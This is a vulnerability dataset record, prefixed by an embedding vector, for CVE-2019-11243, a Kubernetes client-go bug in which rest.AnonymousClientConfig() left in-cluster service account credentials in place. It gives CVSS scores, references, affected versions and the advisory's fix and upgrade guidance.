-0.024506008252501488, -0.004432997200638056, -0.003858278738334775, 0.01027597114443779, 0.0018687938572838902, 0.003007694846019149, -0.017992528155446053, 0.014498238451778889, -0.0025287626776844263, -0.0015124682104215026, -0.0034617227502167225, -0.01533349696546793, 0.015456103719770908, 0.026053916662931442, -0.009325769729912281, 0.009708915837109089, -0.020567268133163452, 0.0032605710439383984, 0.023433199152350426, 0.00875871442258358, -0.014758777804672718, -0.006367884110659361, -0.024689918383955956, -0.004103492014110088, -0.014053789898753166, -0.006160985212773085, -0.005413850769400597, -0.005383199080824852, -0.03662874177098274, -0.007425366435199976, 0.0020728190429508686, 0.007685905788093805, -0.017731988802552223, 0.010459881275892258, -0.013678306713700294, 0.01374727301299572, 0.006115007679909468, 0.019019359722733498, 0.01698102429509163, 0.011977138929069042, 0.00731808552518487, 0.0024444705341011286, -0.005609255284070969, -0.012781745754182339, 0.003212678013369441, -0.02168605476617813, -0.01236028503626585, -0.012168711982667446, 0.005475154146552086, 0.00268393661826849, 0.03675134852528572, -0.0015574878780171275, -0.00998478103429079, 0.006126502063125372, 0.00021444194135256112, 0.014804755337536335, -0.028935173526406288, 0.011609318666160107, -0.004076671786606312, 0.0026686107739806175, -0.010919656604528427, -0.00036135443951934576, 0.018023179844021797, -0.002747155725955963, -0.006003895308822393, -0.0075479731895029545, -0.028843218460679054, 0.011869858019053936, 0.0051149968057870865, -0.0010526932310312986, -0.0019253079080954194, -0.008896646089851856, 0.011923498474061489, -0.024873828515410423, -0.00258431863039732, 0.0071571641601622105, -0.0035498463548719883, 0.02649836614727974, -0.00816100649535656, 0.011425409466028214, -0.0005402356619015336, -0.015586373396217823, -0.02947157807648182, 0.016306687146425247, 0.0007648548926226795, 0.01849828101694584, -0.0007241456187330186, 0.010866016149520874, -0.021900616586208344, 0.02254430204629898, -0.001857299474067986, -0.012766419909894466, -0.0069004567340016365, 0.00669355783611536, 0.0013247267343103886, 0.0314486101269722, -0.02346385084092617, -0.01911131478846073, -0.0023314424324780703, -0.020659223198890686, 0.022314414381980896, -0.023341244086623192, -0.005072851199656725, -0.0013630413450300694, 0.013969497755169868, 0.013042284175753593, -0.002419566037133336, 0.007241456303745508, -0.016413968056440353, -0.0312800258398056, 0.014789429493248463, -0.00796177051961422, 0.0036494641099125147, 0.018329696729779243, -0.012069093994796276, -0.015425452031195164, -0.010053747333586216, -0.009134196676313877, -0.01166295912116766, -0.00908821914345026, 0.008130354806780815, -0.03482029587030411, -0.02439872734248638, -0.00038362477789632976, 0.02326461486518383, -0.010551836341619492, 0.032613374292850494, -0.004873615223914385, 0.012957992032170296, -0.013433093205094337, -0.019402505829930305, -0.013126576319336891, 0.022620931267738342, 0.011003948748111725, -0.02154812216758728, 0.0074023776687681675, 0.024291446432471275, -0.0008414840558543801, 0.007685905788093805, 0.014766440726816654, -0.01557104755192995, 0.011164870113134384, -0.006183973979204893, 0.02398492954671383, -0.012980980798602104, -0.01659787818789482, -0.0006077651050873101, 0.028858544304966927, -0.007524984423071146, -0.02631445601582527, -0.01983162946999073, -0.004846794996410608, -0.0011829627910628915, 0.019800977781414986, 0.014467586763203144, 0.004448323044925928, 0.007655254099518061, -0.02121095359325409, 0.010567162185907364, -0.012513543479144573, -0.013961834833025932, 0.0072069731540977955, -0.015195564366877079, -0.0004114028415642679, -0.0009104502969421446, 0.002636043354868889, 0.00968592707067728, -0.02907310612499714, 0.003806554013863206, -0.0029329813551157713, -0.017762640491127968, -0.0009597803582437336, -0.006199299823492765, 0.008743388578295708, -0.021042369306087494, -0.015019317157566547, -0.022130504250526428, 0.012866037897765636, 0.0053563788533210754, -0.0040115369483828545, 0.013938846066594124, 0.008130354806780815, 0.005030705127865076, -0.011318128556013107, 0.0046590534038841724, 0.000977979740127921, 0.007662917021661997, -0.017210911959409714, 0.003385093528777361, 0.005877457093447447, 0.000045708100515184924, -0.000037715919461334124, -0.028322141617536545, 0.0050038849003612995, -0.02180866152048111, 0.002969380235299468, -0.006272097583860159, 0.009900488890707493, 0.004938750062137842, -0.003938739188015461, 0.021732032299041748, -0.004187784157693386, -0.010306622833013535, -0.02980874665081501, -0.005444502457976341, 0.009417724795639515, -0.021042369306087494, -0.004915761295706034, 0.01626070961356163, 0.0036303068045526743, 0.0028735939413309097, 0.023831671103835106, -0.00786215253174305, 0.0014329655095934868, 0.023142009973526, -0.026023264974355698, -0.009494354017078876, -0.014000149443745613, -0.0043525369837880135, -0.006145659368485212, -0.013164890930056572, 0.0016034654108807445, 0.003448312636464834, 0.02067454904317856, -0.0017768389079719782, 0.016230057924985886, 0.014329654164612293, 0.021302908658981323, -0.021456167101860046, 0.0008793197339400649, 0.004436828661710024, -0.00010817883594427258, -0.027142051607370377, -0.024429379031062126, -0.009011589922010899, -0.02346385084092617, -0.0003659042704384774, -0.008023073896765709, -0.0016571057494729757, -0.01995423622429371, 0.0016829681117087603, 0.0005593929090537131, 0.005528794601559639, -0.007708894554525614, 0.030682319775223732, 0.01170127373188734, -0.007341074291616678, -0.001295990776270628, 0.017486777156591415, -0.00657478254288435, -0.006375547032803297, -0.026850860565900803, -0.007701231632381678, -0.006222288589924574, -0.007398546207696199, 0.02208452671766281, -0.018820123746991158, 0.006291254889219999, 0.006226120050996542, -0.0009367915918119252, -0.018360348418354988, -0.009379410184919834, 0.0019166871206834912, 0.0029329813551157713, 0.003283559810370207, 0.01226066704839468, -0.004984727595001459, -0.0021130493842065334, -0.006869805045425892, -0.0015938867582008243, 0.0024348918814212084, -0.005011547822505236, 0.01390819437801838, -0.007467512506991625, -0.0008395683253183961, -0.011517364531755447, 0.024276120588183403, -0.01410743035376072, 0.002003852743655443, -0.0020728190429508686, 0.012574846856296062, -0.018988708034157753, 0.0013381368480622768, -0.008528826758265495, 0.02861333079636097, -0.04177822172641754, -0.0040115369483828545, -0.006728040985763073, -0.008743388578295708, -0.009379410184919834, -0.019923584535717964, -0.007938781753182411, -0.010620802640914917, -0.018666865304112434, -0.012789408676326275, 0.021057695150375366, 0.003289307001978159, 0.007823837921023369, -0.002837195061147213, -0.017624709755182266, -0.008092040196061134, -0.02723400667309761, -0.019800977781414986, 0.01592354103922844, 0.030912207439541817, -0.0021686055697500706, 0.007486669812351465, -0.013417767360806465, 0.012957992032170296, 0.003988548181951046, -0.019739674404263496, 0.0076974001713097095, -0.008413882926106453, -0.0002350360300624743, -0.00007579103839816526, 0.02062857151031494, 0.000044420972699299455, 0.024827850982546806, -0.01041390374302864, -0.008605455979704857, -0.009463702328503132, 0.016843091696500778, -0.0035057845525443554, -0.00918783713132143, 0.01612277701497078, -0.0013525048270821571, 0.026268478482961655, -0.007923455908894539, -0.004429165739566088, -0.007544141728430986, 0.020322056487202644, 0.002226077252998948, 0.011325791478157043, 0.00019468598475214094, -0.0034693856723606586, -0.004819974768906832, 0.02168605476617813, -0.0006915782578289509, 0.003806554013863206, -0.004413840360939503, 0.01678178831934929, 0.001952128135599196, -0.016613204032182693, -0.015517407096922398, -0.0008424419211223722, -0.0006604476366192102, -0.004310390911996365, -0.008628444746136665, -0.00566672720015049, 0.012850712053477764, -0.008482849225401878, 0.008122691884636879, 0.0012298981891945004, -0.011716599576175213, 0.009034578688442707, 0.013662980869412422, 0.008804691955447197, 0.006927276961505413, -0.009264466352760792, -0.004394683055579662, 0.00869741104543209, 0.006567119620740414, -0.010007769800722599, -0.010214668698608875, -0.004429165739566088, -0.010191679932177067, 0.043862536549568176, 0.008375568315386772, -0.018866101279854774, 0.005233772099018097, -0.01324918307363987, -0.002781638875603676, -0.009862174279987812, -0.0029827903490513563, -0.02484317682683468, -0.020107494667172432, 0.00035656511317938566, 0.013578688725829124, -0.01358635164797306, 0.010161028243601322, 0.002409987384453416, 0.004701199475675821, -0.0036398854572325945, -0.005977075081318617, 0.0035594250075519085, -0.010245319455862045, -0.0030824083369225264, 0.0014003980904817581, 0.022498324513435364, -0.02881256677210331, 0.0020095999352633953, 0.023494502529501915, 0.011118892580270767, 0.0009372705244459212, 0.011088240891695023, -0.004639896098524332, -0.012153386138379574, -0.02352515421807766, -0.050391342490911484, -0.0221458300948143, 0.014038464054465294, -0.0020651561208069324, -0.00001549046646687202, 0.002425313228741288, -0.011325791478157043, -0.0030824083369225264, 0.033349014818668365, 0.008567141368985176, 0.006842984817922115, -0.0022912120912224054, 0.010866016149520874, -0.013892868533730507, 0.007892804220318794, 0.004992390517145395, -0.0009047031053341925, 0.007754872087389231, -0.027050096541643143, 0.0013199374079704285, -0.010521184653043747, -0.017747314646840096, -0.0007782650063745677, 0.0208737850189209, 0.035525280982255936, 0.001447333488613367, -0.003396587911993265, 0.024490682408213615, 0.013992486521601677, 0.00948669109493494, -0.022421695291996002, -0.02465926669538021, -0.012168711982667446, 0.03006928600370884, -0.010260645300149918, 0.009356421418488026, -0.008314264938235283, 0.010467544198036194, -0.004498132038861513, -0.007720388937741518, 0.027709107846021652, 0.001770133851096034, 0.0182990450412035, -0.005674390122294426, -0.019203269854187965, 0.003931076265871525, -0.0018994455458596349, -0.026421736925840378, 0.0028965824749320745, 0.006881299428641796, 0.006459839176386595, 0.0002504815929569304, -0.0028525209054350853, 0.01497333962470293, -0.011026937514543533, -0.0005857342039234936, -0.007586287800222635, 0.003344863187521696, 0.004620738793164492, 0.016444619745016098, -0.00046552220010198653, -0.014958013780415058, -0.017410147935152054, 0.020337382331490517, 0.010551836341619492, 0.014429272152483463, -0.005314232781529427, -0.0035364362411201, -0.02023010142147541, 0.020475313067436218, 0.005563277751207352, -0.0021149651147425175, 0.035586584359407425, 0.01871284283697605, 0.014038464054465294, 0.016230057924985886, 0.002088144887238741, 0.020597919821739197, -0.011394757777452469, 0.015080620534718037, 0.0070000747218728065, -0.018605561926960945, 0.003383177798241377, 0.01658255234360695, 0.002086229156702757, 0.009540331549942493, -0.023892974480986595, -0.016904395073652267, -0.01170127373188734, -0.00022809150686953217, 0.003766323672607541, -0.0015230047283694148, -0.017808618023991585, -0.019678371027112007, 0.002091976348310709, 0.0038276270497590303, 0.004475143272429705, -0.0016120861982926726, -0.0009698379435576499, 0.023341244086623192, -0.01368596963584423, 0.015226216055452824, 0.008957949467003345, 0.023709064349532127, -0.012444577179849148, 0.0034981216304004192, 0.0008275950094684958, 0.027540523558855057, 0.017103631049394608, 0.0178545955568552, 0.0016848838422447443, -0.005241435021162033, 0.0013055694289505482, -0.018743494525551796, -0.0008113112999126315, 0.0021207123063504696, 0.009816196747124195, -0.003542183432728052, 0.004888941068202257, -0.01295032911002636, -0.007586287800222635, 0.014061452820897102, -0.01232197042554617, -0.008138017728924751, 0.007406209129840136, 0.0069464342668652534, 0.018728168681263924, 0.01931055076420307, 0.035985056310892105, 0.019938910380005836, 0.004272076301276684, -0.0012777913361787796, -0.018207089975476265, 0.0018237741896882653, -0.03137198090553284, -0.006088187452405691, 0.013555699959397316, 0.008245298638939857, -0.005076682660728693, 0.007563299033790827, 0.022958099842071533, -0.007509658578783274, 0.0021034707315266132, -0.023479176685214043, 0.002463627839460969, 0.000006989418125158409, 0.010245319455862045, 0.011341117322444916, -0.02743324264883995, -0.004275907762348652, -0.007758703548461199, 0.008965612389147282, -0.009693589992821217, -0.0008477101800963283, -0.044843390583992004, 0.015042305923998356, 0.004965570289641619, 0.009632286615669727, -0.028705285862088203, 0.009072893299162388, 0.013164890930056572, -0.00998478103429079, -0.011785565875470638, -0.008873657323420048, -0.012551858089864254, 0.01586223766207695, 0.001805574749596417, -0.0007739546126686037, 0.013103587552905083, -0.006279760506004095, 0.005835311021655798, 0.012230015359818935, 0.025425558909773827, -0.00839855708181858, -0.010620802640914917, 0.01917261816561222, -0.011103566735982895, -0.003714598948135972, 0.0068046702072024345, -0.0000574718760617543, 0.007869815453886986, 0.011318128556013107, 0.007846826687455177, -0.03242946416139603, -0.003482795786112547, 0.006023052614182234, -0.027984973043203354, -0.021640077233314514, -0.016092125326395035, 0.009908151812851429, 0.006145659368485212, 0.0023908300790935755, 0.005402356386184692, 0.0040153684094548225, -0.0013821986503899097, 0.016291361302137375, 0.019525112584233284, -0.002827616408467293, 0.012582509778439999, -0.0019300972344353795, -0.008712736889719963, 0.003969390876591206, 0.009364084340631962, 0.008413882926106453, 0.031417958438396454, 0.014260688796639442, 0.014222374185919762, -0.010628465563058853, -0.021118998527526855, 0.001257676281966269, 0.005865962710231543, -0.0026302961632609367, -0.010866016149520874, 0.022973425686359406, -0.004329548217356205, 0.016843091696500778, 0.005720367655158043, -0.017027001827955246, -0.004084334708750248, 0.013042284175753593, 0.007321916986256838, -0.0291497353464365, -0.0061571537517011166, 0.003927244804799557, 0.02081248164176941, 0.001953086000867188, -0.011525027453899384, 0.000929607602301985, 0.006647580303251743, -0.0056054238229990005, -0.00984684843569994, -0.02095041424036026, -0.004796986002475023, -0.015708979219198227, -0.012130397371947765, 0.0066590746864676476, -0.008046062663197517, -0.030758948996663094, 0.023693738505244255, -0.011915835551917553, -0.02537958137691021, -0.001256718416698277, 0.007954107597470284, -0.010459881275892258, -0.014199385419487953, 0.012636150233447552, 0.022636257112026215, 0.012904352508485317, 0.0009784586727619171, -0.009555657394230366, 0.01404612697660923, 0.0160001702606678, 0.0061571537517011166, -0.028996476903557777, -0.013923520222306252, 0.00017947988817468286, -0.01453655306249857, 0.021502144634723663, -0.03439117223024368, -0.008513500913977623, 0.00855947844684124, -0.013571025803685188, -0.01295032911002636, 0.0026590321213006973, 0.0031513746362179518, 0.00642918748781085, 0.009862174279987812, -0.016505923122167587, -0.006563288159668446, -0.019004033878445625, 0.014459923841059208, -0.01639864221215248, -0.01176257710903883, 0.01533349696546793, -0.013463744893670082, -0.029992656782269478, -0.030498409643769264, 0.005754850804805756, 0.013042284175753593, -0.0202914047986269, 0.004689705092459917, -0.0011408167192712426, -0.005927266087383032, -0.00826062448322773, -0.0006192594883032143, -0.009892825968563557, 0.01043689250946045, -0.004436828661710024, -0.011295139789581299, -0.019402505829930305, 0.011479049921035767, 0.00408050324767828, 0.008605455979704857, 0.017946550622582436, 0.011938824318349361, 0.01275875698775053, 0.020935088396072388, 0.008774040266871452, -0.01053651049733162, -0.027142051607370377, 0.011831543408334255, -0.001068019075319171, -0.015548058785498142, 0.008590130135416985, 0.008122691884636879, 0.017226237803697586, 0.019540438428521156, -0.0028640152886509895, -0.004885109607130289, -0.012076756916940212, -0.004605412948876619, -0.0059617492370307446, -0.018728168681263924, 0.016168754547834396, 0.010996285825967789, -0.006222288589924574, -0.008919634856283665, 0.005069019738584757, -0.012015453539788723, -0.007360231596976519, 0.015517407096922398, 0.0006724209524691105, -0.006812333129346371, -0.0010967550333589315, 0.008030736818909645, 0.0008165795588865876, 0.008275950327515602, -0.022559627890586853, 0.0070958612486720085, -0.004168626852333546, 0.005494311451911926, 0.0014023138210177422, -0.004153301008045673, -0.007804681081324816, -0.007938781753182411, -0.009011589922010899, 0.0033084643073379993, -0.004432997200638056, 0.00017876148922368884, 0.008153343573212624, -0.0025824028998613358, -0.00679317582398653, 0.0028563523665070534, -0.007984759286046028, 0.01344841904938221, -0.026881512254476547, -0.017670687288045883, -0.026912163943052292, -0.012092082761228085, -0.027540523558855057, 0.018942730501294136, -0.020000213757157326, 0.010482870042324066, -0.004295065067708492, -0.014421609230339527, -0.008751051500439644, -0.0017078726086765528, 0.010712757706642151, 0.006433018948882818, 0.004049851559102535, -0.004536446649581194, -0.003289307001978159, 0.008038399741053581, -0.0007298928103409708, 0.02332591824233532, -0.0003352526109665632, -0.0024291446898132563, -0.027647804468870163, -0.010881341993808746, -0.011065252125263214, -0.017027001827955246, -0.007728051859885454, -0.009003926999866962, 0.010122713632881641, -0.015954192727804184, 0.016766462475061417, -0.0051035028882324696, -0.0083602424710989, -0.003908087499439716, -0.0027758916839957237, 0.012904352508485317, 0.0320003405213356, 0.03485094755887985, -0.016705159097909927, -0.018207089975476265, 0.00034052086994051933, 0.01659787818789482, -0.008965612389147282, -0.0036801157984882593, 0.019264573231339455, -0.0014751114649698138, -0.008275950327515602, 0.011877520941197872, -0.008038399741053581, 0.005160974338650703, 0.0019281815038993955, 0.0039617279544472694, 0.005425345152616501, -0.02206920087337494, -0.020521290600299835, 0.01018401701003313, 0.011341117322444916, -0.027417916804552078, -0.011341117322444916, 0.030115263536572456, -0.005528794601559639, -0.006137996446341276, 0.0144369350746274, 0.0185749102383852, 0.005092008505016565, -0.029119083657860756, -0.012115071527659893, -0.001251929090358317, 0.010421566665172577, 0.010551836341619492, 0.0014233868569135666, -0.004950244445353746, 0.027310635894536972, 0.016030821949243546, -0.013831565156579018, 0.006088187452405691, -0.0010622718837112188, -0.006957928650081158, -0.01851360686123371, -0.007869815453886986, -0.022636257112026215, 0.0017615130636841059, 0.005513468757271767, 0.01580093428492546, 0.008505837991833687, 0.011908172629773617, -0.006333400961011648, -0.025824030861258507, 0.0035536778159439564, -0.0033257058821618557, 0.015118935145437717, -0.0062031312845647335, 0.004122649319469929, -0.023632435128092766, -0.0033027171157300472, 0.021164976060390472, 0.0008558520348742604, 0.007214636076241732, 0.013325812295079231, 0.019816303625702858, 0.008283613249659538, 0.013854553923010826, -0.006716546602547169, -0.00576634518802166, 0.03359422832727432, 0.010988622903823853, -0.013417767360806465, 0.012214689515531063, 0.02308070659637451, 0.004310390911996365, 0.020797155797481537, 0.045916199684143066, 0.0008501048432663083, -0.002373588504269719, 0.0221458300948143, 0.010965634137392044, 0.005800827872008085, 0.01606147363781929, -0.020797155797481537, -0.017072979360818863, -0.002425313228741288, 0.023295266553759575, 0.001443502027541399, -0.011494375765323639, -0.008444534614682198, -0.008850669488310814, -0.0005991443176753819, 0.009954129345715046, 0.01869751699268818, -0.01041390374302864, -0.006413861643522978, -0.004536446649581194, -0.003208846552297473, -0.004252918995916843, 0.03393139690160751, -0.010260645300149918, -0.014889047481119633, -0.023632435128092766, 0.020797155797481537, 0.00022593631001655012, 0.030636342242360115, -0.0037835652474313974, -0.0035536778159439564, 0.011854532174766064, -0.00816100649535656, -0.010138039477169514, -0.02009216882288456, -0.0028563523665070534, -0.003287391271442175, -0.010957971215248108, 0.0031820263247936964, 0.01216104906052351, -0.0010306623298674822, -0.006295086350291967, -0.005865962710231543, -0.012367947958409786, -0.008452197536826134, 0.004747177008539438, 0.002599644474685192, -0.007946444675326347, -0.023371895775198936, -0.010260645300149918, -0.0021264594979584217, -0.015754956752061844, 0.019341202452778816, 0.006015389692038298, 0.022896796464920044, -0.03390074521303177, -0.00852116383612156, -0.01586223766207695, -0.0015038474230095744, 0.006808501668274403, -0.0035881607327610254, 0.01147138699889183, 0.008436871692538261, -0.019586415961384773, 0.005892782937735319, -0.010712757706642151, 0.007199310231953859, -0.0020287572406232357, 0.04236060380935669, 0.006291254889219999, -0.006314243655651808, -0.004321885295212269, -0.0064445133320987225, 0.0033142114989459515, 0.00006956491415621713, 0.012444577179849148, 0.0334409698843956, -0.007249119225889444, 0.011348780244588852, -0.0018735831836238503, -0.017686013132333755, 0.014827744103968143, 0.009532668627798557, 0.006241445895284414, 0.009011589922010899, -0.02206920087337494, -0.012774082832038403, 0.014329654164612293, -0.018620887771248817, -0.010712757706642151, -0.012222352437675, 0.016352664679288864, -0.016367990523576736, 0.003931076265871525, 0.01517257560044527, 0.0154331149533391, -0.004222267307341099, 0.01219936367124319, 0.0011408167192712426, -0.0010526932310312986, 0.01229898165911436, -0.016337338835000992, -0.003429155331104994, -0.007705063093453646, 0.011877520941197872, -0.013471407815814018, 0.004597750026732683, -0.023831671103835106, -0.010138039477169514, 0.005674390122294426, 0.005854468327015638, -0.014567204751074314, 0.004145638085901737, -0.0034617227502167225, -0.018329696729779243, 0.026391085237264633, -0.001204035826958716, -0.005919603165239096, 0.0174407996237278, -0.004026862792670727, -0.007954107597470284, -0.010199342854321003, 0.014061452820897102, 0.008705073967576027, -0.0157243050634861, 0.012076756916940212, 0.01004608441144228, 0.014122756198048592, 0.0033199586905539036, -0.0005833395407535136, -0.017486777156591415, 0.01083536446094513, -0.020199449732899666, -0.008122691884636879, 0.017946550622582436, 0.009532668627798557, 0.007034557871520519, 0.009425387717783451, 0.023693738505244255, -0.006582445465028286, -0.001068976940587163, -0.006908119656145573, 0.0066054342314600945, -0.009839185513556004, -0.010881341993808746, -0.029257016256451607, -0.011456061154603958, 0.018007853999733925, -0.012682127766311169, 0.05446801334619522, -0.0012720442609861493, 0.013762598857283592, 0.022712886333465576, -0.009394736029207706, -0.01364765502512455, -0.00472418824210763, 0.010237656533718109, 0.0029023296665400267, 0.002045998815447092, 0.0037260933313518763, -0.001530667650513351, 0.023678412660956383, 0.014751114882528782, 0.007846826687455177, 0.009624623693525791, -0.002555582672357559, 0.005888951476663351, 0.004249087534844875, -0.01592354103922844, -0.030237870290875435, 0.014406283386051655, 0.034268565475940704, -0.00011673974950099364, 0.004091997630894184, 0.018222415819764137, 0.008919634856283665, -0.01863621361553669, 0.010682106018066406, -0.029027128592133522, 0.02306538075208664, 0.013739610090851784, -0.009923477657139301, -0.008367905393242836, -0.003996211104094982, 0.0044061774387955666, -0.008636107668280602, 0.02524164877831936, 0.01923392154276371, -0.0009818112011998892, 0.016291361302137375, -0.01027597114443779, -0.0028640152886509895, 0.0015689822612330317, 0.027142051607370377, 0.008475186303257942, -0.00869741104543209, 0.007241456303745508, -0.003159037558361888, 0.01598484441637993, -0.008536489680409431, 0.019065337255597115, 0.002000021282583475, -0.005463659763336182, -0.017425473779439926, 0.025302952155470848, 0.026467714458703995, -0.0052146147936582565, 0.006406198721379042, 0.00010787950304802507, 0.007494332734495401, -0.025624794885516167, -0.003670537145808339, -0.005900445859879255, -0.025364255532622337, 0.0012471397640183568, 0.0026571163907647133, 0.01869751699268818, 0.012467565946280956, 0.041195839643478394, 0.008206984028220177, -0.014651496894657612, 0.009425387717783451, -0.0038716888520866632, 0.004950244445353746, -0.0011417745845392346, 0.0038831832353025675, -0.021701380610466003, -0.01612277701497078, 0.004183952696621418, 0.0025709085166454315, -0.00176821812056005, 0.026084568351507187, -0.01665918156504631, -0.017072979360818863, -0.02557881735265255, -0.018023179844021797, 0.009808533824980259, -0.010866016149520874, -0.013839228078722954, 0.01718026027083397, 0.02380101941525936, 0.014321991242468357, -0.013532711192965508, -0.0017595973331481218, 0.003969390876591206, -0.01889675296843052, -0.002651369199156761, 0.014352642931044102, -0.0002816121850628406, 0.00954799447208643, -0.001019167946651578, -0.004693536553531885, -0.0023429368156939745, 0.016735810786485672, -0.023555805906653404, -0.010153365321457386, -0.0015191732672974467, -0.008781703189015388, 0.00829893909394741, -0.002513436833396554, -0.00381804839707911, 0.002042167354375124, -0.006406198721379042, -0.00036398853990249336, -0.01619940623641014, -0.004885109607130289, -0.0051035028882324696, -0.003385093528777361, 0.0021168808452785015, -0.016674507409334183, 0.0022011729888617992, 0.0027778074145317078, 0.01803850568830967, 0.01318787969648838, 0.009877500124275684, 0.031816430389881134, 0.0317244753241539, 0.026912163943052292, -0.0012337296502664685, -0.00944837648421526, -0.027417916804552078, 0.00954799447208643, 0.020996391773223877, 0.013264508917927742, 0.013440756127238274, -0.0000782455681473948, 0.01364765502512455, -0.01473578903824091, -0.013256845995783806, -0.008436871692538261, 0.06559456884860992, -0.009731904603540897, -0.0010593982879072428, -0.013639992102980614, 0.024935131892561913, -0.004452154505997896, 0.001395608764141798, 0.0029368128161877394, -0.018130460754036903, 0.012643813155591488, -0.0015641929348930717, 0.014513564296066761, 0.00038769570528529584, -0.013525048270821571, 0.017563406378030777, -0.0029463914688676596, -0.0005957917892374098, 0.0014645749470219016, 0.004329548217356205, 0.008942623622715473, -0.005107334349304438, -0.021333560347557068, 0.02841409668326378, 0.0016925467643886805, 0.0020766505040228367, 0.0008390893926844001, -0.0010469460394233465, -0.023816345259547234, -0.006957928650081158, 0.01473578903824091, -0.020383359864354134, 0.012076756916940212, -0.007908130064606667, 0.021042369306087494, -0.005180131644010544, 0.011203184723854065, -0.024168839678168297, -0.0033697676844894886, 0.0071571641601622105, 0.0087203998118639, -0.0012366032460704446, -0.018360348418354988, -0.0025594141334295273, 0.016935046762228012, -0.00028903564088977873, -0.014712800271809101, 0.004896603990346193, 0.002749071456491947, 0.010911993682384491, -0.019402505829930305, -0.004367862828075886, -0.010697431862354279, 0.011210847645998001, 0.0005364042008295655, 0.005597760900855064, -0.006620760075747967, -0.023295266553759575, 0.011049926280975342, -0.013241520151495934, -0.00530656985938549, -0.030437106266617775, -0.008551815524697304, 0.0034195766784250736 ]
CVE-2019-11243
2019-04-22T15:29:00.790000
In Kubernetes v1.12.0-v1.12.4 and v1.13.0, the rest.AnonymousClientConfig() method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the affected versions, rest.AnonymousClientConfig() did not effectively clear service account credentials loaded using rest.InClusterConfig()
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.0" }, "exploitabilityScore": 1.6, "impactScore": 1.4, "source": "[email protected]", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108053" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/76797" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20190509-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "DA1909D3-D45E-4AD4-B773-51ADCFC63113", "versionEndExcluding": null, "versionEndIncluding": "1.12.4", "versionStartExcluding": null, "versionStartIncluding": "1.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.13.0:*:*:*:*:*:*:*", "matchCriteriaId": "E277E5AC-48ED-4993-9D3F-F0551E70BBE0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:trident:-:*:*:*:*:*:*:*", "matchCriteriaId": "5D9A34F5-AC03-4098-A37D-AD50727DDB11", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/76797
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N The `rest.AnonymousClientConfig()` method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the following versions, `rest.AnonymousClientConfig()` did not effectively clear service account credentials loaded using `rest.InClusterConfig()`: * v1.12.0-v1.12.4 * v1.13.0 **What is the impact?** * `k8s.io/client-go` users that use the `rest.AnonymousClientConfig()` method directly with client config loaded with `rest.InClusterConfig()` receive back a client config which can still send the loaded service account token with requests. **How was the issue fixed?** * In 1.12.5+ and 1.13.1+, `rest.InClusterConfig()` was modified to return a client config that is safe to use with the `rest.AnonymousClientConfig()` method (https://github.com/kubernetes/kubernetes/pull/71713) * In v1.15.0, the `rest.AnonymousClientConfig()` will also exclude the `config.Transport` and `config.WrapTransport` fields, in addition to the explicit credential-carrying fields. (https://github.com/kubernetes/kubernetes/pull/75771) **How do I resolve the issue?** * Upgrade `k8s.io/client-go` to `kubernetes-1.12.5`, `kubernetes-1.13.1`, `kubernetes-1.14.0`, or higher * or manually clear the `config.WrapTransport` and `config.Transport` fields in addition to calling `rest.AnonymousClientConfig()` Thanks to Oleg Bulatov of Red Hat for reporting this issue. /area security /kind bug /sig auth /sig api-machinery /assign /close
CVE-2019-11243: v1.12.0-v1.12.4, v1.13.0: rest.AnonymousClientConfig() does not remove the serviceaccount credentials from config created by rest.InClusterConfig()
https://api.github.com/repos/kubernetes/kubernetes/issues/76797/comments
2
2019-04-18T21:31:53
2022-05-16T21:59:22Z
https://github.com/kubernetes/kubernetes/issues/76797
434,967,981
76,797
true
